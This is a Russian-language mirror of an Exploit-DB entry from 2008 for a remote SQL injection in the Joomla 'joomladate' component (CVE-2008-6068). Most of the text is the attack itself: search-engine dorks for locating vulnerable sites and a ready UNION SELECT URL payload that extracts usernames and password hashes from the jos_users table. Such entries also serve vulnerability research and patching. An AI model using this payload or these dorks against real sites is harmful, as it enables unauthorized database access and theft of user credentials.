- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5748
- Проверка EDB
-
- Пройдено
- Автор
- HIS0K4
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6068
- Дата публикации
- 2008-06-05
Код:
/---------------------------------------------------------------\
\ /
/ Joomla Component joomladate Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : inurl:com_joomladate
[*] Dork 2 : inurl:com_joomladate "user"
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_joomladate&task=viewProfile&user={SQL}
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_joomladate&task=viewProfile&user=9999999 UNION SELECT user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user() FROM jos_users--
----------------------------------------------------------------------------
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...
# milw0rm.com [2008-06-05]
- Источник
- www.exploit-db.com